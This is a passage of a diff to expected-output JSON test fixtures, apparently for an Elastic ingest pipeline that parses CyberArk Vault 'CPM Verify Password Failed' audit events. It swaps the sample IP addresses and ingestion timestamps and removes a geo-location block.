Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814397\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:19:58\",\"IsoTimestamp\":\"2021-03-15T13:19:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=34.66.114.180;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814397\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\ELASTIC\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\ELASTIC\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). ", + "ingested": "2021-12-09T13:37:01.193593200Z", + "original": "\u003c7\u003e1 2021-03-15T13:19:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:19:58\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:19:58Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814397\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:19:58\",\"IsoTimestamp\":\"2021-03-15T13:19:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \\n\",\"ExtraDetails\":\"address=67.43.156.15;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814397\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 67.43.156.15\\\\ELASTIC\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The specified username is invalid. (winRc=2202). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "38", "kind": "event", "action": "cpm verify password failed", @@ -128,22 +117,11 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", "user": { "name": "bart" }, - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "user": { @@ -166,7 +144,7 @@ }, "@timestamp": "2021-03-15T13:25:32.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -178,27 +156,27 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n", + "reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n", "iso_timestamp": "2021-03-15T13:25:32Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814709\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e38\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814709\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Verify Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -208,11 +186,11 @@ "retries_count": "0", "reset_immediately": "VerifyTask", "last_task": "VerifyTask", - "cpm_error_details": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ", + "cpm_error_details": "Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). ", "last_fail_date": "1615814709", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Verify Password Failed", @@ -225,9 +203,9 @@ }, "event": { "severity": 7, - "reason": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ", - "ingested": "2021-06-09T10:24:34.493901800Z", - "original": "\u003c7\u003e1 2021-03-15T13:25:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;username=bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814709\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserDN\\\" Value=\\\"ELASTIC.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 06:25:32\",\"IsoTimestamp\":\"2021-03-15T13:25:32Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"38\",\"Desc\":\"CPM Verify Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Verify Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \\n\",\"ExtraDetails\":\"address=34.66.114.180;username=bart;\",\"Message\":\"CPM Verify Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"VerifyTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615814709\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"UserDN\",\"Value\":\"ELASTIC.local\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Error in verifypass to user 34.66.114.180\\\\bart on domain 34.66.114.180(\\\\\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "reason": "Error in verifypass to user 67.43.156.15\\bart on domain 67.43.156.15(\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). ", + "ingested": "2021-12-09T13:37:01.193602100Z", + "original": "\u003c7\u003e1 2021-03-15T13:25:32Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 06:25:32\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T13:25:32Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e38\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Verify Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Verify Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 67.43.156.15\\\\bart on domain 67.43.156.15(\\\\\\\\67.43.156.15). Reason: The network name cannot be found. (winRc=67). \\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Verify Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615814709\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserDN\\\" Value=\\\"ELASTIC.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" 